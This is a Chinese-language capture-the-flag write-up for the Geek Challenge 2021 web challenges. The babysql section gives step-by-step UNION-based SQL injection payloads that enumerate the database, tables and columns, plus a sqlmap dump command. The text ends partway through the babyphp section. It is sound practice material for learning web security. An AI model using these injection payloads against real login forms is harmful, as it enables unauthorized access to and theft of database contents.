[极客大挑战2021]web wp

极客大挑战2021 Welcome2021

F12，提示请使用WELCOME请求方法来请求此网页

burp抓包，修改请求方法，发现f1111aaaggg9.php

再次请求得到flag

Dark

Tor浏览器访问即可

babysql

查库：babysql

uname=-1' union select database(),2,3,4#&pwd=1

查表：jeff,jeffjokes

uname=-1' union select group_concat(table_name),2,3,4 from information_schema.tables where table_schema=database()%23&pwd=1

查列：

jeff

uname,pwd,zzzz,uselesss

uname=-1' union select group_concat(column_name),2,3,4 from information_schema.columns where table_name="jeff"%23&pwd=1

jeffjokes

id,english,chinese,misc,useless

uname=-1' union select group_concat(column_name),2,3,4 from information_schema.columns where table_name="jeffjokes"%23&pwd=1

查数据：

没有查出flag

uname=-1' union select group_concat(chinese),2,3,4 from jeffjokes#&pwd=1

有一句话，猜测是提示：

编译器从来不给Jeff编译警告，而是Jeff警告编译器,所有指针都是指向Jeff的,gcc的-O4优化选项是将你的代码邮件给Jeff重写一下,当Jeff触发程序的程序性能采样时，循环会因害怕而自动展开。,Jeff依然孤独地等待着数学家们解开他在PI的数字中隐藏的笑话

这是谷歌大神jeff bean的事迹

ps：sb了，找错库了

python2 sqlmap.py -r 1.txt -D flag -T fllag -C  "fllllllag" --dump

babyphp

robots.txt，得到

noobcurl.php

进入